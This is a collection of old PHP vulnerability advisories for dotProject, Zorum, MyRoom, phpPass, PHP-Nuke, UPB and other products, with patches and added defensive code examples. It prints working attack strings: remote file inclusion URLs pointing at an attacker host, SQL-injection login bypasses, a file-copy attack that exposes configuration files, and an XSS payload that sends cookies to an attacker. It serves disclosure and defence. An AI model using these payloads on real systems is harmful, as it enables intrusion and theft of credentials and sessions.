http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker

Solution:
Please check the vendor's website for new patches. As a temporary solution, create a .htaccess file that contains 'Deny from all'. Place it in the /modules/ directory and that should block remote users from accessing it.

Contact:
Name: Mindwarper
Email: [EMAIL PROTECTED]
Website: http://mindlock.bestweb.net
Re: Zorum Portal (PHP)
A patch has been created for this hole and can be found on http://www.phpsecure.org/.

From: MGhz [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Zorum Portal (PHP)
Date: 22 Jan 2003 19:45:26 -

Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file
File : include.php
PHP Code :
---
[...]
include("$gorumDir/generformlib_multipleselection.php");
include("$gorumDir/generformlib_groupselection.php");
include("$gorumDir/generformlib_filebutton.php");
include("$gorumDir/group.php");
[...]
---
Exploit :
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
--> includes http://[attacker]/group.php from the remote server

[EMAIL PROTECTED]
MyRoom (PHP)
Information :
Website : http://www.plansbiz.net
Version : 3.5 GOLD
Problem : File copy/upload

PHP Code/Location :
room/save_item.php :
---
if($name == "" OR $ref == ""){
    echo "You are fogot enter your 'ITEM NAME' or 'ITEM REF NO' !";
    echo "<br>";
    echo "<a href='$main_file?show=additem'>Try Agains [ Click Here ]</a>";
    exit;
}
if($photo!="none" AND $photo!="application/octet-stream"){
    //get type of file
    $filetype=$photo_type;
    //get lenght of image type
    $filelenght=strlen($filetype);
    //get part of file image to build image extension
    $pos=strpos($filetype,"/")+1;
    //build extension of image
    $fileextention=substr($filetype,$pos,$filelenght);
    if($fileextention=="pjpeg"){
        $fileextention="jpg";
    }
    $image=date("YmdHis");
    $image.=".".$fileextention;
    $imgpath = $imgroot;
    //if image exist, upload it in correct dir
    if($photo<>"none") {
        if(!copy($photo,"$imgpath/$image")) {
            //display errors
            $msg="<br><font color='text00'>File Not Uploaded, it might be too large or does not exist..<br>Please Try Again!</font>";
            break;
        }
        //or finish
        else {
            dbconnect();
            $sql= "INSERT INTO room_item SET it_photo='$image', it_name='$name', it_decs='$decs', it_ab='$album', it_ref='$ref'";
            mysql_query($sql) or die(mysql_error());
            echo "<meta http-equiv='refresh' content='0;URL= $main_file?show=additem&m=1&i=$name'>";
            echo "<br>Your File Was Uploaded Sucessful!! <br><br><a href='$main_file?show=additem&m=1&i=$name'>Loading ..</a>";
        }
    }
---

Exploits :
http://[target]/room/save_item.php?name=[NAME]&ref=hacked&photo=../inc/conf.php&photo_type=ttxt
+ http://[target]/room/index.php?show=search&search=it_name&item=[NAME]
to find the url of the txt file into which conf.php was copied.

Patch :
A patch can be found on http://www.phpsecure.info (english version available) .

More Details :
In French : http://www.frog-man.org/tutos/MyRoom.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyRoom.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
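Added example, not MyRoom code and not part of the advisory above. save_item.php calls copy() on a request parameter and takes the file extension from a client-supplied type string, so any file the web server can read is copied into the image directory under an extension of the client's choosing. The handler below reads only the $_FILES entry, checks the temporary file with is_uploaded_file(), decides the type from the bytes, and builds the name itself. The $_FILES field name, the image root and the use of random_bytes() (PHP 7+) are this example's assumptions.

```php
<?php
// Added example, not MyRoom code. store_uploaded_image() is an assumed
// replacement for the copy($photo, ...) block in save_item.php.

function store_uploaded_image(array $file, $imgRoot) {
    // $file is one entry of $_FILES, e.g. $_FILES['photo'] (assumed field name).
    if (!isset($file['tmp_name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    // Refuses anything that did not arrive through the HTTP upload machinery,
    // which is exactly the advisory's photo=../inc/conf.php case.
    if (!is_uploaded_file($file['tmp_name'])) {
        return false;
    }
    // Decide the type from the content, not from $photo_type / $file['type'].
    $info = @getimagesize($file['tmp_name']);
    $types = array(IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif');
    if ($info === false || !isset($types[$info[2]])) {
        return false;
    }
    // Server-generated name: timestamp plus random suffix, extension from the sniffed type.
    $name = date('YmdHis') . '_' . bin2hex(random_bytes(4)) . '.' . $types[$info[2]];
    $dest = rtrim($imgRoot, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return false;
    }
    return $name;
}

// Constructed input mirroring the exploit: a server path instead of an upload.
$fake = array('tmp_name' => '../inc/conf.php', 'error' => UPLOAD_ERR_OK, 'type' => 'ttxt');
var_dump(store_uploaded_image($fake, '/var/www/html/room/img'));   // bool(false)
```

Storing the image directory outside the document root, or serving it through a script that sets the Content-Type from the stored type, removes the remaining risk that a file with a valid image header and PHP code appended is ever executed.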
phpPass (PHP)
Information :
Version : 2
Website : http://www.agames-net.com
Problem : SQL Injection

PHP Code/Location :
accesscontrol.php :
---
[...]
session_register("uid");
session_register("pwd");
[...]
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
[...]
if (mysql_num_rows($result) == 0) {
    session_unregister("uid");
    session_unregister("pwd");
?>
<html>
<head>
<title>
Access Denied
</title>
[...]
exit;
[...]
---

Exploit :
http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='

Patch :
In accesscontrol.php, replace the lines :
---
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
---
by :
---
$uid=addslashes($uid);
$pwd=addslashes($pwd);
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
---
A patch can be found on http://www.phpsecure.org .

More details :
In French : http://www.frog-man.org/tutos/phpPass.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpPass.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
vSignup, vAuthenticate (PHP)
Information :
Product : vAuthenticate
Version : 2.8

Product : vSignup
Version : 2.1

Website : http://www.beanbug.net
Problem : SQL Injection

PHP Code/Location :
chgpwd.php :
---
<?
if (!class_exists("auth")) {
    include ("auth.php");
}
include ("authconfig.php");
include ("check.php");
?>
---
admin/index.php :
---
<?
if (!class_exists("auth")) {
    include ("../auth.php");
}
include ("../authconfig.php");
include ("../check.php");
if ($check["level"] != 1) {
---
check.php :
---
<?
$CheckSecurity = new auth();
$check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
if ($check == false) {
    // Feel free to change the error message below. Just make sure you put a \ before
    // any double quote.
    print "<font face=\"Arial, Helvetica, sans-serif\" size=\"5\" color=\"#FF\">";
    print "<b>Illegal Access</b>";
    print "</font><br>";
    print "<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"2\" color=\"#00\">";
    print "<b>You do not have permission to view this page.</b></font>";
    exit; // End program execution. This will disable continuation of processing the rest of the page.
}
?>
---
auth.php :
---
function page_check($username, $password) {
    $query = "SELECT * FROM authuser WHERE uname='$username' AND passwd='$password' AND status <> 'inactive'";
    $connection = mysql_connect($this->HOST, $this->USERNAME, $this->PASSWORD);
    // OLD CODE - DO NOT REMOVE
    // $result = mysql_db_query($this->DBNAME, $query);
    // REVISED CODE
    $SelectedDB = mysql_select_db($this->DBNAME);
    $result = mysql_query($query);
    $numrows = mysql_num_rows($result);
    $row = mysql_fetch_array($result);
    // CHECK IF THERE ARE RESULTS
    // Logic: If the number of rows of the resulting recordset is 0, that means that no
    // match was found. Meaning, wrong username-password combination.
    if ($numrows == 0) {
        return false;
    } else {
        return $row;
    }
} // End: function page_check
---

Exploits :
http://[target]/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='
http://[target]/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1

Patches :
A patch can be found on http://www.phpsecure.org.

More details :
In French : http://www.frog-man.org/tutos/vAuth-Signup.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
E-theni (PHP)
Information :
Version : ?
Website : http://www.theni.freesurf.fr
Problems :
- Include file
- phpinfo()

PHP Code/Location :
/admin_t/include/aff_liste_langue.php :
---
require ($rep_include."para_langue.php");
---
/admin_t/include/find_theni_home.php :
---
<html>
<body>
<?
phpinfo();
?>
</body></html>
---

Exploits :
- http://[target]/admin_t/include/aff_liste_langue.php?rep_include=http://[attacker]/
  with : http://[attacker]/para_langue.php
  (This will work only if register_globals=ON)
- http://[target]/admin_t/include/find_theni_home.php

Patches :
In admin_t/include/aff_liste_langue.php, replace the line :
---
require ($rep_include."para_langue.php");
---
by :
---
if (file_exists($rep_include."para_langue.php")){
    require ($rep_include."para_langue.php");
}
---
And replace the file /admin_t/include/find_theni_home.php by :
---
<?
session_start();
if (session_is_registered("USER")==FALSE or $USER["id_user"]<>1){
    exit;
} else {
    echo "<html>";
    echo "<body>";
    phpinfo();
    echo "</body></html>";
}
?>
---
A patch can be found on http://www.phpsecure.org.

More details :
In French : http://www.frog-man.org/tutos/E-theni.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FE-theni.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
OpenTopic security hole
Information :
Product : OpenTopic
Website : http://www.infopop.com
Version : 2.3.1
Problem : XSS (script injection) - Cookie recovery

Location/Exploit :
The XSS hole is in the private messages area ( http://[target]/OpenTopic?a=ugtpc ).
XSS to get the cookie :
[IMG]http://[website]/img.gif"width=750"height=750"onmouseover="a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]

More details about XSS :
In French : http://www.phpsecure.org/article/XSS.php
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.phpsecure.org%2Farticle%2FXSS.php&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII

frog-m@n
N/X (PHP)
Information :
Website : http://nxwcms.sourceforge.net/
Version : 2002 PreRelease 1
Problem : Include file

PHP Code/Location :
nx/common/cds/menu.inc.php :
---
[...]
require_once $c_path."common/lib/launch.inc.php";
[...]
---
nx/common/dbo/datasets.php :
---
<?
require_once $c_path."common/dbo/saveset.php";
require_once $c_path."common/dbo/recordset.php";
require_once $c_path."common/dbo/deleteset.php";
require_once $c_path."common/dbo/updateset.php";
require_once $c_path."common/dbo/insertset.php";
[...]
---
nx/common/lib/mass_opeations.inc.php :
---
<?
require_once $c_path."common/lib/launch.inc.php";
require_once $c_path."common/cds/menu.inc.php";
[...]
---
etc...

Exploits :
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/
with : http://[attacker]/common/lib/launch.inc.php

http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/
with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php
etc...

Solution :
Add this line in the bugged files :
---
if (!file_exists($c_path."index.php")){ die("Path not found."); }
---
A patch can be found on http://www.phpsecure.org .

More details :
In French : http://www.frog-man.org/tutos/NX.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNX.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
PEEL (PHP)
Informations :
Version : 1.0b
Website : http://www.mapetite-entreprise.com
Problem : Include file

PHP Code/Location :

modeles/haut.php :
---
<?php
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
require ($langfile);
?>
[...]
---

Exploit :
http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=.
with :
http://[attacker]/lang/lang.php

Patch :
In modeles/haut.php replace the lines :
---
<?php
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
require ($langfile);
?>
---
by :
---
<?php
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
if (file_exists($langfile)){
    require ($langfile);
}
?>
---
A patch can be found on http://www.phpsecure.org

More details :
In French : http://www.frog-man.org/tutos/PEEL.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPEEL.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
SPGpartenaires (PHP)
Informations :
Version : ? - 3.0.1
Website : http://www.scripts-php-gratuits.com
Problem : SQL Injection - Access to members' accounts

PHP Code/Location :

modif/ident.php :
--
[...]
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'";
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0])) {
    header("location: index.php?msg=Identification+incorrecte+!");
} else {
    setcookie("SPGP",$id."||".$pass,time()+84600,"");
    header("location: index2.php");
}
[...]
--

modif/delete.php, modif/index2.php, modif/modif.php, modif/modif_suite.php :
--
<?php
if(!isset($SPGP)) {
    header("location: index.php?msg=Veuillez+vous+identifier+!");
} else {
    $inf=explode("||",$SPGP);
    [...]
    $sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'";
    $re=@mysql_db_query($db_name,$sql,$connect);
    $result=@mysql_fetch_array($re);
    if(empty($result[0])) {
        header("location: index.php?msg=Veuillez+vous+identifier+!");
    }
[...]
--

Exploits :
http://[target]/modif/ident.php?id=[MEMBERID]&pass='%20OR%20''='
or, in the query string : ?SPGP=[ID]%7C%7C'%20OR%20''='
with :
- modif/delete.php
- modif/index2.php
- modif/modif.php
- modif/modif_suite.php

Patch :
In modif/ident.php replace the line :
---
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'";
---
by :
---
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".addslashes($id)."' AND motdepasse='".addslashes($pass)."'";
---
And in the other files replace the line :
---
$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'";
---
by :
---
$sql="SELECT id FROM SPGPartenaires WHERE id='".addslashes($inf[0])."' AND motdepasse='".addslashes($inf[1])."'";
---
A patch can be found on http://www.phpsecure.org.

More details :
In French : http://www.frog-man.org/tutos/SPGpartenaires.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSPGpartenaires.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
WAnewsletter (PHP)
Informations :
Website : http://www.phpcodeur.net
Versions : 2.0beta - 2.1.0
Problem : Include file

PHP Code/Location :

newsletter.php 2.1beta - 2.1.0 :
---
if( !empty($HTTP_POST_VARS['action']) ) {
    $action = $HTTP_POST_VARS['action'];
} else if( !empty($HTTP_GET_VARS['action']) ) {
    $action = $HTTP_GET_VARS['action'];
} else {
    $action = '';
}
if( $action != '' || defined('IN_WA_FORM') ) {
    $login = false;
    include_once($waroot . 'start.php');
}
[...]
---

sql/db_type.php 2.0.2 - 2.1.0 :
---
switch($dbtype) {
    case 'mysql':
        include_once($waroot . 'sql/mysql/mysql.inc.php');
        break;
    case 'mssql':
        include_once($waroot . 'sql/mssql/mssql.inc.php');
        break;
    default:
        echo '<b>Le type de base de données n\'est pas défini !</b>';
        exit;
        break;
}
[...]
---
etc...

Exploits :
http://[target]/newsletter.php?action=1&waroot=http://[attacker]/
http://[target]/sql/db_type.php?waroot=http://[attacker]/

Patch :
A patch can be found on http://www.phpsecure.org .

More details :
In French : http://www.frog-man.org/tutos/WAnewsletter.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWAnewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
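The N/X, PEEL and WAnewsletter advisories above share one root cause: the directory prefix of an include() is a variable that register_globals lets the client set. The patches shown (a file_exists() test before the include) stop the remote case because PHP's http:// wrapper does not support stat(), so file_exists() returns false for such URLs; they do not stop a local path the web server can read, and they leave the prefix under client control. The following is an added example, not code from any of these projects: it takes the application root from __DIR__, accepts only an allowlisted fragment name, and confirms with realpath() that the resolved file stays inside the expected directory. Function, directory and language names are hypothetical.

```php
<?php
// Added example (not N/X, PEEL or WAnewsletter code). The application root is
// derived from the script location, never from a request variable.
define('APP_ROOT', realpath(__DIR__));

/**
 * Resolve a user-selected fragment (for example a language code) to a PHP file
 * under APP_ROOT/$subdir. Returns the absolute path, or null when the name is
 * not in the allowlist or the resolved path escapes the expected directory.
 */
function resolve_fragment(string $subdir, string $name, array $allowed): ?string
{
    // 1. Allowlist: only fragments we ship. This alone rejects "http://",
    //    "../" and NUL-byte tricks because the whole value must match exactly.
    if (!in_array($name, $allowed, true)) {
        return null;
    }

    // 2. Defence in depth: even with a correct allowlist, verify that the file
    //    the filesystem resolves is still inside the base directory.
    $base = realpath(APP_ROOT . '/' . $subdir);
    $path = realpath($base . '/' . $name . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Usage: a language fragment chosen by the client. The request value is only a
// key into the allowlist, so it never becomes part of an include path itself.
$lang = $_GET['lang'] ?? 'fr';
$file = resolve_fragment('lang', $lang, ['fr', 'en', 'de']);
if ($file === null) {
    http_response_code(400);
    exit('Unknown language.');
}
require $file;
```

Disabling allow_url_include (available since PHP 5.2) removes the remote-include case at the interpreter level, but local traversal remains possible whenever a request variable is concatenated into a path, so the allowlist is the part that actually closes the hole.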
PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting
Informations :
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :
- Path Disclosure
- XSS

Development :
Most of PHP-Nuke's files are included by modules.php or index.php. To prevent direct access, PHP-Nuke uses two kinds of guard.

The first one (e.g. in modules/Downloads/index.php) is :
---
if (!eregi("modules.php", $PHP_SELF)) {
    die ("You can't access this file directly...");
}
---

The second one (e.g. footer.php) :
---
if (eregi("footer.php",$PHP_SELF)) {
    Header("Location: index.php");
    die();
}
---

Some files have neither guard, and those files have security holes.

Exploits :

Path Disclosure :
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1

Path Disclosure & Cross Site Scripting :
- http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
  or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
  or http://[target]/modules/Forums/bb_smilies.php?site_font=}--/style[SCRIPT]
  or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=;[SCRIPT]
  or with : $sitename $table_width $color1 $forumver
- /modules/Forums/bbcode_ref.php with : $name $Default_Theme $site_font $sitename $bgcolor2 $textcolor1 $bgcolor1 $forumver
- /modules/Forums/editpost.php, /modules/Forums/newtopic.php, /modules/Forums/reply.php, /modules/Forums/topicadmin.php, /modules/Forums/viewforum.php with : $name
- /modules/Forums/searchbb.php with : $name $bgcolor3 $bgcolor1

Patch :
A patch can be found on http://www.phpsecure.org .

More details :
In French : http://www.frog-man.org/tutos/PHPNuke6.0.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txt&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII

frog-m@n
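Two things go wrong in the PHP-Nuke files listed above: a file reached directly runs without the entry script's setup, so PHP's own warnings reveal the installation path, and template variables such as $site_font or $bgcolor1 are read from globals that register_globals fills from the query string. The following added example (not PHP-Nuke code; file, constant and variable names are hypothetical) shows the defender's pattern for both: the entry script defines a constant that included files require, which is a more reliable marker than inspecting the request URL with eregi(); error display is turned off so a direct hit cannot leak paths; and theme values come from a fixed configuration array and are validated or encoded before they are written into CSS or HTML.

```php
<?php
// Added example, not PHP-Nuke code. Hypothetical names throughout.

// ---- done once by the entry script (the role modules.php plays) ----
define('IN_APP', true);            // marker that cannot be set by the client
ini_set('display_errors', '0');    // no file paths in the HTTP response
ini_set('log_errors', '1');        // keep them in the server log instead
error_reporting(E_ALL);

// ---- done at the top of every included file ----
function assert_included(): void
{
    if (!defined('IN_APP')) {
        header('HTTP/1.0 403 Forbidden');
        exit('Direct access is not allowed.');
    }
}

// Theme values come from $cfg, which the application fills from its config
// file. Each value is checked against the grammar of the context it lands in:
// a CSS font name, a CSS colour, or HTML text.
function render_smilies_page(array $cfg): string
{
    assert_included();

    $font = preg_match('/^[A-Za-z0-9 ,\-]{1,40}$/', $cfg['site_font'])
        ? $cfg['site_font'] : 'sans-serif';
    $bg = preg_match('/^#[0-9A-Fa-f]{6}$/', $cfg['bgcolor1'])
        ? $cfg['bgcolor1'] : '#FFFFFF';
    $name = htmlspecialchars($cfg['sitename'], ENT_QUOTES, 'UTF-8');

    return "<style>body { font-family: $font; background: $bg; }</style>\n"
         . "<h1>$name smilies</h1>\n";
}

// Constructed configuration; a value like "}--</style><script>" would fail the
// font regex and fall back to the default instead of reaching the page.
$cfg = ['site_font' => 'Verdana', 'bgcolor1' => '#FFFFFF', 'sitename' => 'Demo <site>'];
echo render_smilies_page($cfg);
```

The important ordering detail is that $cfg is assigned by the application after any register_globals import has happened, so a same-named query parameter cannot overwrite it; the regex checks are there for the case where a configuration value itself is ever attacker-influenced.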
Security Patchs for PHP Products
PHPSecure made some patches for security holes in PHP products. Here is the list :

- ALP - Banner Ad 2.0 : http://www.phpsecure.org/index.php?id=1&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=ALP
- Tight Auction 3.0 : http://www.phpsecure.org/index.php?id=6&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=TightAuction
- PY-Membres 3.1 : http://www.phpsecure.org/index.php?id=9&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=PY-Membres
- dobermann FORUM 0.5 : http://www.phpsecure.org/index.php?id=8&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=dobermann FORUM
- phpnewsDev 1 : http://www.phpsecure.org/index.php?id=10&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=phpnewsDev
- KillerProtection 1 : http://www.phpsecure.org/index.php?id=11&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=KillerProtection
- phpSecurePages 0.27b : http://www.phpsecure.org/index.php?id=12&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=phpSecurePages
- Avotravis 2.1 : http://www.phpsecure.org/index.php?id=13&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=Avotravis
- PunxNews 2.1 : http://www.phpsecure.org/index.php?id=14&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=PunxNews
- phpforge 2.3 : http://www.phpsecure.org/index.php?id=15&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=phpforge
- phpforge 3b2 : http://www.phpsecure.org/index.php?id=60&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=phpforge
- Inertianews 0.02 beta : http://www.phpsecure.org/index.php?id=17&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=Inertianews
- MySimpleNews 1 : http://www.phpsecure.org/index.php?id=16&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=MySimpleNews
- Pollen 1.4.1 : http://www.phpsecure.org/index.php?id=18&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=Pollen
- Pphlogger (Power Phlogger) 2.0.9 : http://www.phpsecure.org/index.php?id=7&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=Pphlogger (Power Phlogger)
- News Evolution 1.0 : http://www.phpsecure.org/index.php?id=21&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=News Evolution
- News Evolution 2.0 : http://www.phpsecure.org/index.php?id=22&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=News Evolution
- LokwaBB 1.2.2 : http://www.phpsecure.org/index.php?id=23&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=LokwaBB
- Rose 4.52 : http://www.phpsecure.org/index.php?id=24&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=Rose
- WebChat for XOOPS RC3 1-5 : http://www.phpsecure.org/index.php?id=25&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=WebChat for XOOPS RC3
- EasyNews 4.2 , 4.3 : http://www.phpsecure.org/index.php?id=26&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=EasyNews
- Mon Album 0.6.2d : http://www.phpsecure.org/index.php?id=27&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=Mon Album
- XOOPS RC3 : http://www.phpsecure.org/index.php?id=61&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=XOOPS
- Photo Db 1.4 : http://www.phpsecure.org/index.php?id=28&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=Photo Db
- PHP Image View 1.0 : http://www.phpsecure.org/index.php?id=29&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=PHP Image View
- mcPass 1 : http://www.phpsecure.org/index.php?id=30&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=mcPass
- Pseudo-Frame 1.0 : http://www.phpsecure.org/index.php?id=31&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=Pseudo-Frame
- SimpleBBS 1.0.3 : http://www.phpsecure.org/index.php?id=32&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=SimpleBBS
- SimpleBBS 1.0.6 : http://www.phpsecure.org/index.php?id=33&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=SimpleBBS
- WSC (Web Server Creator) - Web Portal 0.1 : http://www.phpsecure.org/index.php?id=34&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=WSC (Web Server Creator) - Web Portal
- Immobilier 1 : http://www.phpsecure.org/index.php?id=35&zone=pDl
  More details : http://online.securityfocus.com/search?category=22&query=Immobilier
- FreeNews 2.1 : http://www.phpsecure.org/index.php?id=20&zone=pDl
  More details :
MyPHPLinks (PHP) : SQL Injection
Informations :
Website : http://www.myphpsoft.net
Version : ? - 2.1.9, 2.2.0CVS
Problem : SQL Injection - Admin access

PHP Code/Location :

admin/auth/checksession.php
---
[...]
if($idsession!=''){
    $dbs = new data(0,$MyPHPLinksHote, $MyPHPLinksBase, $MyPHPLinksUser, $MyPHPLinksPass);
    if(!$dbs->connect()) die($dbs->error);
    if(!$dbs->query("select count(*) as nb from ".$MyPHPLinksTBAuth." where session='".$idsession."' and timesession > now()")) die($dbs->error);
    while($dbs->nextrecord()){
        $loginauth = $dbs->valeur("nb");
    }
    if ($loginauth==0){
        header("Location:$MyPHPLinksAuthPErrDef");exit;
    }else{
        if(!$dbs->query("UPDATE ".$MyPHPLinksTBAuth." set timesession=now()+".$MyPHPLinksTLSession." where session='".$idsession."'")) die($dbs->error);
    }
}else{
    header("Location:$MyPHPLinksAuthPErrDef");exit;
}
?>
---

Exploit :
http://[target]/admin/index.php?idsession='%20OR%20''='

Patch :
A patch can be downloaded on http://www.phpsecure.org/index.php?zone=pPatch&AsAlpha=m .

More details :
In French : http://www.frog-man.org/tutos/MyPhpLinks.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyPhpLinks.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
Re: XSS and Path Disclosure in UPB
Everything about UPB was already written (1.1 / 1.0beta) : http://www.frogsecure.com/tutos/UPB.txt

From: euronymous [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: XSS and Path Disclosure in UPB
Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK)

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: XSS and Path Disclosure in UPB
product: Ultimate PHP Board (UPB) final beta 1.0
vendor: http://www.webrc.ca/php/upb.php
risk: middle
date: 12/7/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/009.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

description
---

1) when calling add.php, which comes with upb, it outputs some error message that contains the following information:

Warning: Failed opening 'textdb_v2.inc.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/samcom/public_html/public/messageboard2/add.php on line 5
attempting to edit record...
Fatal error: Call to undefined function: format_field() in /home/samcom/public_html/public/messageboard2/add.php on line 11

as you can see, the script output contains the full physical path of the board.

2) but if the user has deleted this file (add.php) you can view the full path in this way:
==
http://hostname.com/phorum/viewtopic.php?id=some_shit&t_id=2
==
cos the `id' parameter doesn't check if the input data has been entered correctly, it then outputs the following error message:
===--=== snip =
Warning: Unable to access ./data_dir/some_shit.dat in /home/samcom/public_html/public/messageboard2/textdb.inc.php on line 240
..
Warning: Supplied argument is not a valid File-Handle resource in /home/samcom/public_html/public/messageboard2/textdb.inc.php on line 241
..
=== snip ==
where `data_dir' is the name of the directory where important files are stored, e.g. users.dat with users' passwords (md5). by default the name of this directory is `db'. if the user doesn't make this dir secure, then you can get the users' passwds by reading the file users.dat (default name.. but it is old stuff) and cracking the md5 hashes.

